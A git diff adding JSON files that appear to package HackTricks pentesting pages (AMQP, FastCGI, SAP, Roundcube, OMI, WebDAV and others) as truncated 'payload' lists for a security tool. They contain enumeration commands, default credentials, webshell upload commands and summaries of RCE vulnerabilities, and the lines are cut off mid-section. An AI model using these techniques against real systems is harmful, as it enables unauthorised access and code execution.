@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_17b0c4ad6a6b",
+ "category": "network-services-pentesting",
+ "title": "5671 5672 pentesting amqp",
+ "description": "# 5671,5672 - Pentesting AMQP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html):\n\n> **RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\\\n> A **message can include any kind of information**. I",
+ "payloads": [
+ "# 5671,5672 - Pentesting AMQP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html):",
+ "> **RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\\",
+ "> A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\\",
+ "> Definition from .",
+ "**Default port**: 5672,5671",
+ "PORT STATE SERVICE VERSION",
+ "5672/tcp open amqp RabbitMQ 3.1.5 (0-9)",
+ "- **Default credentials**: `guest:guest`. RabbitMQ restricts them to localhost through `loopback_users`, but many Docker/IoT images disable that check, so always test remote login before assuming it is blocked.",
+ "- **Authentication mechanisms**: PLAIN and AMQPLAIN are enabled by default, ANONYMOUS is mapped to `anonymous_login_user`/`anonymous_login_pass`, and EXTERNAL (x509) can be exposed when TLS is enabled. Enumerate what the broker advertises so you know whether to try password spraying or certificate impersonation later.",
+ "## Enumeration",
+ "### Manual",
+ "```python"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5671-5672-pentesting-amqp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_18b783bc98f9.json b/skills/network_services_pentesting_18b783bc98f9.json
new file mode 100644
index 0000000..ce8f248
--- /dev/null
+++ b/skills/network_services_pentesting_18b783bc98f9.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_18b783bc98f9",
+ "category": "network-services-pentesting",
+ "title": "8333 18333 38333 18444 pentesting bitcoin",
+ "description": "# 8333,18333,38333,18444 - Pentesting Bitcoin\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n- The **port 8333** is used by Bitcoin nodes in the **mainnet** to communicate between them.\n- The **port 18333** is used Bitcoin nodes in the **testnet** to communicate between them.\n- The **port 38333** is used Bitcoin nodes in the **signet** to communicate between them.\n- The **port 18444** is used Bitcoin nodes in the **regtest** (local) to communicate between them.\n\n**Default",
+ "payloads": [
+ "# 8333,18333,38333,18444 - Pentesting Bitcoin",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "- The **port 8333** is used by Bitcoin nodes in the **mainnet** to communicate between them.",
+ "- The **port 18333** is used Bitcoin nodes in the **testnet** to communicate between them.",
+ "- The **port 38333** is used Bitcoin nodes in the **signet** to communicate between them.",
+ "- The **port 18444** is used Bitcoin nodes in the **regtest** (local) to communicate between them.",
+ "**Default port:** 8333, 18333, 38333, 18444",
+ "PORT STATE SERVICE",
+ "8333/tcp open bitcoin",
+ "### Shodan",
+ "- `port:8333 bitcoin`",
+ "- `User-Agent: /Satoshi`",
+ "## Enumeration",
+ "Bitcoin nodes will give you some information if they think that you are another valid bitcoin node. **Nmap** have some script to extract this information:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_19ba4b100628.json b/skills/network_services_pentesting_19ba4b100628.json
new file mode 100644
index 0000000..346834d
--- /dev/null
+++ b/skills/network_services_pentesting_19ba4b100628.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_19ba4b100628",
+ "category": "network-services-pentesting",
+ "title": "pentesting finger",
+ "description": "# 79 - Pentesting Finger\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## **Basic Info**\n\nThe **Finger** program/service is utilized for retrieving details about computer users. Typically, the information provided includes the **user's login name, full name**, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the ",
+ "payloads": [
+ "# 79 - Pentesting Finger",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Info**",
+ "The **Finger** program/service is utilized for retrieving details about computer users. Typically, the information provided includes the **user's login name, full name**, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the user, and the contents of the user's plan and project files.",
+ "**Default port:** 79",
+ "PORT STATE SERVICE",
+ "79/tcp open finger",
+ "## **Enumeration**",
+ "### **Banner Grabbing/Basic connection**",
+ "```bash",
+ "nc -vn 79",
+ "echo \"root\" | nc -vn 79",
+ "### **User enumeration**",
+ "```bash",
+ "finger @ #List users"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-finger.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_1a28bb344bd7.json b/skills/network_services_pentesting_1a28bb344bd7.json
new file mode 100644
index 0000000..a43879a
--- /dev/null
+++ b/skills/network_services_pentesting_1a28bb344bd7.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_1a28bb344bd7",
+ "category": "network-services-pentesting",
+ "title": "9000 pentesting fastcgi",
+ "description": "# 9000 Pentesting FastCGI\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nIf you want to **learn what is FastCGI** check the following page:\n\n\n{{#ref}}\npentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md\n{{#endref}}\n\nBy default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**.\n\n## Enumeration / Quick checks\n\n* **Port scan:** `n",
+ "payloads": [
+ "# 9000 Pentesting FastCGI",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "If you want to **learn what is FastCGI** check the following page:",
+ "{{#ref}}",
+ "pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md",
+ "{{#endref}}",
+ "By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**.",
+ "## Enumeration / Quick checks",
+ "* **Port scan:** `nmap -sV -p9000 ` (will often show \"unknown\" service; manually test).",
+ "* **Probe FPM status page:** `SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000` (default php-fpm `pm.status_path`).",
+ "* **Find reachable sockets via SSRF:** if an HTTP service is exploitable for SSRF, try `gopher://127.0.0.1:9000/_...` payloads to hit the FastCGI listener.",
+ "* **Nginx misconfigs:** `cgi.fix_pathinfo=1` with `fastcgi_split_path_info` errors let you append `/.php` to static files and reach PHP (code exec via traversal).",
+ "## RCE",
+ "It's quite easy to make FastCGI execute arbitrary code:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/9000-pentesting-fastcgi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_1b7616cf8f22.json b/skills/network_services_pentesting_1b7616cf8f22.json
new file mode 100644
index 0000000..d5c33c9
--- /dev/null
+++ b/skills/network_services_pentesting_1b7616cf8f22.json
@@ -0,0 +1,25 @@
+{
+ "id": "network_services_pentesting_1b7616cf8f22",
+ "category": "network-services-pentesting",
+ "title": "1026 pentesting rusersd",
+ "description": "# 1026 - Pentesting Rusersd\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThis protocol will provide you the usernames of the host. You may be able to find this services listed by the port-mapper service like this:\n\n.png>)\n\n### Enumeration\n\n```\nroot@kali:~# apt-get install rusers\nroot@kali:~# rusers -l 192.168.10.1\nSending broadcast for rusersd protocol version 3...\nSending broadcast for rusersd protocol version 2...\ntiff potatohead:conso",
+ "payloads": [
+ "# 1026 - Pentesting Rusersd",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "This protocol will provide you the usernames of the host. You may be able to find this services listed by the port-mapper service like this:",
+ ".png>)",
+ "### Enumeration",
+ "root@kali:~# apt-get install rusers",
+ "root@kali:~# rusers -l 192.168.10.1",
+ "Sending broadcast for rusersd protocol version 3...",
+ "Sending broadcast for rusersd protocol version 2...",
+ "tiff potatohead:console Sep 2 13:03 22:03",
+ "katykat potatohead:ttyp5 Sep 1 09:35 14",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/1026-pentesting-rusersd.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_1bea79e2c9e6.json b/skills/network_services_pentesting_1bea79e2c9e6.json
new file mode 100644
index 0000000..8cc4e69
--- /dev/null
+++ b/skills/network_services_pentesting_1bea79e2c9e6.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_1bea79e2c9e6",
+ "category": "network-services-pentesting",
+ "title": "pentesting sap",
+ "description": "# Pentesting SAP\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Introduction about SAP\n\nSAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \\(Enterprise Resource Planning\\) software as well as the name of the company. \nSAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.\n\nEach SAP instance \\(or SID\\) is composed of three layers: database, application and pre",
+ "payloads": [
+ "# Pentesting SAP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Introduction about SAP",
+ "SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \\(Enterprise Resource Planning\\) software as well as the name of the company.",
+ "SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.",
+ "Each SAP instance \\(or SID\\) is composed of three layers: database, application and presentation\\), each landscape usually consists of four instances: dev, test, QA and production.",
+ "Each of the layers can be exploited to some extent, but most effect can be gained by **attacking the database**.",
+ "Each SAP instance is divided into clients. Each one has a user SAP\\*, the application\u2019s equivalent of \u201croot\u201d.",
+ "Upon initial creation, this user SAP\\* gets a default password: \u201c060719992\u201d \\(more default password below\\).",
+ "You\u2019d be surprised if you knew how often these **passwords aren\u2019t changed in test or dev environments**!",
+ "Try to get access to the shell of any server using username <SID>adm.",
+ "Bruteforcing can help, whoever there can be Account Lockout mechanism.",
+ "## Discovery",
+ "> Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3!",
+ "- Check the Application Scope or Program Brief for testing. Take note of the hostnames or system instances for connecting to SAP GUI."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-sap.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_1cc2c65160e9.json b/skills/network_services_pentesting_1cc2c65160e9.json
new file mode 100644
index 0000000..764a39d
--- /dev/null
+++ b/skills/network_services_pentesting_1cc2c65160e9.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_1cc2c65160e9",
+ "category": "network-services-pentesting",
+ "title": "3702 udp pentesting ws discovery",
+ "description": "# 3702/UDP - Pentesting WS-Discovery\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe **Web Services Dynamic Discovery Protocol (WS-Discovery)** is identified as a protocol designed for the discovery of services within a local network through multicast. It facilitates the interaction between **Target Services** and **Clients**. Target Services are endpoints available for discovery, while Clients are the ones actively searching for these services. Communication is establ",
+ "payloads": [
+ "# 3702/UDP - Pentesting WS-Discovery",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The **Web Services Dynamic Discovery Protocol (WS-Discovery)** is identified as a protocol designed for the discovery of services within a local network through multicast. It facilitates the interaction between **Target Services** and **Clients**. Target Services are endpoints available for discovery, while Clients are the ones actively searching for these services. Communication is established using **SOAP queries over UDP**, directed to the multicast address **239.255.255.250** and UDP port **3702**.",
+ "Upon joining a network, a Target Service announces its presence by broadcasting a **multicast Hello**. It remains open to receiving **multicast Probes** from Clients that are on the lookout for services by Type, an identifier unique to the endpoint (e.g., **NetworkVideoTransmitter** for an IP camera). In response to a matching Probe, a Target Service may send a **unicast Probe Match**. Similarly, a Target Service could receive a **multicast Resolve** aimed at identifying a service by name, to which it may reply with a **unicast Resolve Match** if it is the intended target. In the event of leaving the network, a Target Service attempts to broadcast a **multicast Bye**, signaling its departure.",
+ ".png>)",
+ "**Default port**: 3702",
+ "PORT STATE SERVICE",
+ "3702/udp open|filtered unknown",
+ "| wsdd-discover:",
+ "| Devices",
+ "| Message id: 39a2b7f2-fdbd-690c-c7c9-deadbeefceb3",
+ "| Address: http://10.0.200.116:50000",
+ "|_ Type: Device wprt:PrintDeviceType",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_1edcd64a15d9.json b/skills/network_services_pentesting_1edcd64a15d9.json
new file mode 100644
index 0000000..cc1f2cf
--- /dev/null
+++ b/skills/network_services_pentesting_1edcd64a15d9.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_1edcd64a15d9",
+ "category": "network-services-pentesting",
+ "title": "873 pentesting rsync",
+ "description": "# 873 - Pentesting Rsync\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\nFrom [wikipedia](https://en.wikipedia.org/wiki/Rsync):\n\n> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [",
+ "payloads": [
+ "# 873 - Pentesting Rsync",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "From [wikipedia](https://en.wikipedia.org/wiki/Rsync):",
+ "> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times]()and sizes of files.[\\[3\\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\\[3\\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.",
+ "**Default port:** 873",
+ "PORT STATE SERVICE REASON",
+ "873/tcp open rsync syn-ack",
+ "## Enumeration",
+ "### Banner & Manual communication",
+ "```bash",
+ "nc -vn 127.0.0.1 873",
+ "(UNKNOWN) [127.0.0.1] 873 (rsync) open",
+ "@RSYNCD: 31.0 <--- You receive this banner with the version from the server",
+ "@RSYNCD: 31.0 <--- Then you send the same info"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/873-pentesting-rsync.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_208e7393d898.json b/skills/network_services_pentesting_208e7393d898.json
new file mode 100644
index 0000000..6e2e100
--- /dev/null
+++ b/skills/network_services_pentesting_208e7393d898.json
@@ -0,0 +1,16 @@
+{
+ "id": "network_services_pentesting_208e7393d898",
+ "category": "network-services-pentesting",
+ "title": "artifactory hacking guide",
+ "description": "# Artifactory Hacking Guide\n\n{{#include ../../banners/hacktricks-training.md}}\n\n**Check this post:** [**https://www.errno.fr/artifactory/Attacking_Artifactory**](https://www.errno.fr/artifactory/Attacking_Artifactory)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n\n",
+ "payloads": [
+ "# Artifactory Hacking Guide",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "**Check this post:** [**https://www.errno.fr/artifactory/Attacking_Artifactory**](https://www.errno.fr/artifactory/Attacking_Artifactory)",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2355f81de0a4.json b/skills/network_services_pentesting_2355f81de0a4.json
new file mode 100644
index 0000000..e586fba
--- /dev/null
+++ b/skills/network_services_pentesting_2355f81de0a4.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2355f81de0a4",
+ "category": "network-services-pentesting",
+ "title": "roundcube",
+ "description": "# Roundcube\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nRoundcube is a PHP webmail client commonly exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints:\n- HTML source often leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion)\n- Default app path in containers/VMs: /var/www/html/roundcube\n- Main config: config/config.inc.php\n\n## Authenticated RCE via PHP object deserialization (CVE-2025-49113)\n\nAffected versions (per vendor/NVD):\n- 1.6.x before 1.6.",
+ "payloads": [
+ "# Roundcube",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Roundcube is a PHP webmail client commonly exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints:",
+ "- HTML source often leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion)",
+ "- Default app path in containers/VMs: /var/www/html/roundcube",
+ "- Main config: config/config.inc.php",
+ "## Authenticated RCE via PHP object deserialization (CVE-2025-49113)",
+ "Affected versions (per vendor/NVD):",
+ "- 1.6.x before 1.6.11",
+ "- 1.5.x before 1.5.10",
+ "Bug summary",
+ "- The _from parameter in program/actions/settings/upload.php is not validated, enabling injection of attacker\u2011controlled data that Roundcube later unserializes, leading to gadget chain execution and remote code execution in the web context (post\u2011auth).",
+ "Quick exploitation",
+ "- Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/roundcube.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_25b6b9114f8c.json b/skills/network_services_pentesting_25b6b9114f8c.json
new file mode 100644
index 0000000..355e1ae
--- /dev/null
+++ b/skills/network_services_pentesting_25b6b9114f8c.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_25b6b9114f8c",
+ "category": "network-services-pentesting",
+ "title": "5985 5986 pentesting omi",
+ "description": "# 5985,5986 - Pentesting OMI\n\n{{#include ../banners/hacktricks-training.md}}\n\n### **Basic Information**\n\n**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. It's particularly relevant for Linux servers on Azure that utilize services such as:\n\n- **Azure Automation**\n- **Azure Automatic Update**\n- **Azure Operations Management Suite**\n- **Azure Log Analytics**\n- **Azure Configuration Management**\n- **Azure ",
+ "payloads": [
+ "# 5985,5986 - Pentesting OMI",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "### **Basic Information**",
+ "**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. It's particularly relevant for Linux servers on Azure that utilize services such as:",
+ "- **Azure Automation**",
+ "- **Azure Automatic Update**",
+ "- **Azure Operations Management Suite**",
+ "- **Azure Log Analytics**",
+ "- **Azure Configuration Management**",
+ "- **Azure Diagnostics**",
+ "The process `omiengine` is initiated and listens on all interfaces as root when these services are activated.",
+ "**Default ports** used are **5985** (http) and **5986** (https).",
+ "### **[CVE-2021-38647 Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**",
+ "As observed on September 16, Linux servers deployed in Azure with the mentioned services are susceptible due to a vulnerable version of OMI. This vulnerability lies in the OMI server's handling of messages through the `/wsman` endpoint without requiring an Authentication header, incorrectly authorizing the client.",
+ "An attacker can exploit this by sending an \"ExecuteShellCommand\" SOAP payload without an Authentication header, compelling the server to execute commands with root privileges."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5985-5986-pentesting-omi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_280980858707.json b/skills/network_services_pentesting_280980858707.json
new file mode 100644
index 0000000..2f8886a
--- /dev/null
+++ b/skills/network_services_pentesting_280980858707.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_280980858707",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass via mem",
+ "description": "# via mem\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\nFrom [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)\n\n```php\n=2.68\n2\uff09PHP-CGI or PHP-FPM\uff09\u56e0\u4e3amod_php\u5e76\u6ca1\u6709\u8bfb\u53d6/proc/self/mem\n3\uff09\u4ee3\u7801\u9488\u5bf9x64\u7f16\u5199\uff0c\u8981\u7528\u4e8ex32\u9700\u8981\u66f4\u6539\n4\uff09Open_basedir=off\uff08\u6216\u8005\u80fd\u7ed5\u8fc7open_basedir\u8bfb\u5199 /lib/ \u548c/proc/\uff09\n*/\n/*\n$libc_ver:\nbeched@linuxoid ~ $ php -r 'readfile(\"/proc/self/maps\");' | grep libc\n7f3dfa609000-7f3dfa7c4000 r-xp 00000000 08:01 9831386",
+ "payloads": [
+ "# via mem",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)",
+ "```php",
+ "1. kernel>=2.68",
+ "2\uff09PHP-CGI or PHP-FPM\uff09\u56e0\u4e3amod_php\u5e76\u6ca1\u6709\u8bfb\u53d6/proc/self/mem",
+ "3\uff09\u4ee3\u7801\u9488\u5bf9x64\u7f16\u5199\uff0c\u8981\u7528\u4e8ex32\u9700\u8981\u66f4\u6539",
+ "4\uff09Open_basedir=off\uff08\u6216\u8005\u80fd\u7ed5\u8fc7open_basedir\u8bfb\u5199 /lib/ \u548c/proc/\uff09",
+ "$libc_ver:",
+ "beched@linuxoid ~ $ php -r 'readfile(\"/proc/self/maps\");' | grep libc",
+ "7f3dfa609000-7f3dfa7c4000 r-xp 00000000 08:01 9831386 /lib/x86_64-linux-gnu/libc-2.19.so",
+ "$open_php:",
+ "beched@linuxoid ~ $ objdump -R /usr/bin/php | grep '\\sopen$'",
+ "0000000000e94998 R_X86_64_JUMP_SLOT open",
+ "$system_offset and $open_offset:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_282664888f7d.json b/skills/network_services_pentesting_282664888f7d.json
new file mode 100644
index 0000000..f4686e8
--- /dev/null
+++ b/skills/network_services_pentesting_282664888f7d.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_282664888f7d",
+ "category": "network-services-pentesting",
+ "title": "623 udp ipmi",
+ "description": "# 623/UDP/TCP - IPMI\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\n### **Overview of IPMI**\n\n**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially usefu",
+ "payloads": [
+ "# 623/UDP/TCP - IPMI",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "### **Overview of IPMI**",
+ "**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for:",
+ "- Pre-OS boot configurations",
+ "- Power-off management",
+ "- Recovery from system failures",
+ "IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection.",
+ "Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include:",
+ "- **Baseboard Management Controller (BMC):** The main micro-controller for IPMI operations.",
+ "- **Communication Buses and Interfaces:** For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections.",
+ "- **IPMI Memory:** For storing logs and data.",
+ "",
+ "**Default Port**: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/623-udp-ipmi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_283fa3a4596b.json b/skills/network_services_pentesting_283fa3a4596b.json
new file mode 100644
index 0000000..c2af345
--- /dev/null
+++ b/skills/network_services_pentesting_283fa3a4596b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_283fa3a4596b",
+ "category": "network-services-pentesting",
+ "title": "put method webdav",
+ "description": "# WebDav\n\n{{#include ../../banners/hacktricks-training.md}}\n\nWhen dealing with a **HTTP Server with WebDav** enabled, it's possible to **manipulate files** if you have the right **credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves the **upload and execution of a webshell**.\n\nAccess to the WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-hacking/brute-force.md#http-basic-auth) b",
+ "payloads": [
+ "# WebDav",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "When dealing with a **HTTP Server with WebDav** enabled, it's possible to **manipulate files** if you have the right **credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves the **upload and execution of a webshell**.",
+ "Access to the WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-hacking/brute-force.md#http-basic-auth) being a common method to acquire them.",
+ "To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might:",
+ "- **Upload** files with **executable extensions** directly if not restricted.",
+ "- **Rename** uploaded non-executable files (like .txt) to an executable extension.",
+ "- **Copy** uploaded non-executable files, changing their extension to one that is executable.",
+ "## DavTest",
+ "**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**:",
+ "```bash",
+ "davtest [-auth user:password] -move -sendbd auto -url http:// #Uplaod .txt files and try to move it to other extensions",
+ "davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every extension",
+ "Output sample:",
+ ".png>)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/put-method-webdav.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_294b07c2a792.json b/skills/network_services_pentesting_294b07c2a792.json
new file mode 100644
index 0000000..6173796
--- /dev/null
+++ b/skills/network_services_pentesting_294b07c2a792.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_294b07c2a792",
+ "category": "network-services-pentesting",
+ "title": "joomla",
+ "description": "# Joomla\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n### Joomla Statistics\n\nJoomla collects some anonymous [usage statistics](https://developer.joomla.org/about/stats.html) such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public [API](https://developer.joomla.org/about/stats/api.html).\n\n```bash\ncurl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool\n\n{\n \"dat",
+ "payloads": [
+ "# Joomla",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "### Joomla Statistics",
+ "Joomla collects some anonymous [usage statistics](https://developer.joomla.org/about/stats.html) such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public [API](https://developer.joomla.org/about/stats/api.html).",
+ "```bash",
+ "curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool",
+ "\"data\": {",
+ "\"cms_version\": {",
+ "\"3.0\": 0,",
+ "\"3.1\": 0,",
+ "\"3.10\": 6.33,",
+ "\"3.2\": 0.01,",
+ "\"3.3\": 0.02,",
+ "\"3.4\": 0.05,",
+ "\"3.5\": 12.24,"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/joomla.md"
+ ]
+}
\ No newline at end of file
